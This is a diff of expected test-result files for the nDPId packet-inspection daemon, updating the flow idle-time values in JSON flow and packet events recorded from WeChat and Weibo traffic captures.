-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166696,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154792,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171267576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171164904,"flow_last_seen":1492171269128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-data-len":561272,"total-not-detected-flows":0,"total-guessed-flows":31,"total-detected-flows":80,"total-detection-updates":66,"total-updates":4,"current-active-flows":0,"total-active-flows":110,"total-idle-flows":110,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":676,"global_ts_msec":1492171291761} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1672/1672 diff --git a/test/results/weibo.pcap.out b/test/results/weibo.pcap.out index 4432cf05b..bac9566cd 100644 --- a/test/results/weibo.pcap.out +++ b/test/results/weibo.pcap.out 
@@ -4,12 +4,12 @@ 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1463089067804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1463089067804,"pkt":"eJKcD6iOkDVu60UQCABFAAClAABAADMR2u3YOtIOwKgBaQG7wNEAkSEpAAl3y2T5ujTCSSEU5zJMPfXh7u\/a3oWq2yhhK1m4ny+qR4W2lfILr6Ils4h\/iqKUCkI0zipqePuQ8qDP3gfa2UEwOgxjQY6zEBJhdLLCAKezbAF+wpbNcZnrqI9Vp3iRS5CpzEuDxhuTRv5J009cEtkCA6nVS0D6WXhVs+S9\/EHIHeXl6YD1cbA="} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1463089067804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1463089067804,"pkt":"eJKcD6iOkDVu60UQCABFAAFTAABAADMR2j\/YOtIOwKgBaQG7wNEBPzHaAAoUu93Ovdfsj+VZ99cgMeSVKfCKokSNRuOMv1PGF2DIkukcXrUmGkv\/ArCiq\/KK23NXKqXH3z8FxKfa8OQtN5x73GaADweitAmqYsU072yu9KsRUtnFIEIB5Y5LqWVX6vqXepSvfYCEhodq+tUiz0aSzdffkeHhLztt20iOOpChbjrtXhyjh2xOYPCWGl\/75gN\/zEEb2R9h09zfr5IUCExPcV8JWIdoh2fXU4mq9qytwCU0GOdjsWy12v2HhTBnSYnXaFz8kW\/ToyswW6z6hT26xiqWB5RJW9cvGUU8G6jKCXTHHR5WczEJ7NLt9QErBQKutf8Nh4rVBXW1avPgj1A0tNYSKXAcYt1eYGsw4tjOzS7DHafUDgikSZ+H9BNuGGXb1gwh45909vW3665ubMpNt9lmWoI="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1463089067805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089067805,"pkt":"kDVu60UQeJKcD6iOCABFAABHtklAAEARGALAqAFp2DrSDsDRAbsAM7beDDzb+3ozZeMBCkxEEj6TblVeBP78aEspYfuydCS19UAd5UCVpxpshuwHMA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089069330,"flow_last_seen":1463089069330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089069330,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1463089069330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069330,"pkt":"kDVu60UQeJKcD6iOCABFAAA0vWJAAEAGDMfAqAFp2DrWTuRwAbsLWGhZZbJo+oAQAO2GIAAAAQEICgBBBg58MNQL"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069374,"pkt":"eJKcD6iOkDVu60UQCABFAAA04pUAADMGNJTYOtZOwKgBaQG75HBlsmj6C1hoWoAQAV4BuwAAAQEICnwxg\/kAQNoT"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070086,"flow_last_seen":1463089070086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089070086,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463089070086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070086,"pkt":"kDVu60UQeJKcD6iOCABFAAA0hxpAAEAGQw\/AqAFp2DrWTuRxAbtN5WEdhI1WjIAQAO065AAAAQEICgBBBst8MNbL"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070131,"pkt":"eJKcD6iOkDVu60UQCABFAAA0MLYAADMG5nPYOtZOwKgBaQG75HGEjVaMTeVhHoAQAV62dAAAAQEICnwxhr4AQNrV"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089069330,"flow_last_seen":1463089069330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089069330,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1463089069330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069330,"pkt":"kDVu60UQeJKcD6iOCABFAAA0vWJAAEAGDMfAqAFp2DrWTuRwAbsLWGhZZbJo+oAQAO2GIAAAAQEICgBBBg58MNQL"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069374,"pkt":"eJKcD6iOkDVu60UQCABFAAA04pUAADMGNJTYOtZOwKgBaQG75HBlsmj6C1hoWoAQAV4BuwAAAQEICnwxg\/kAQNoT"} 
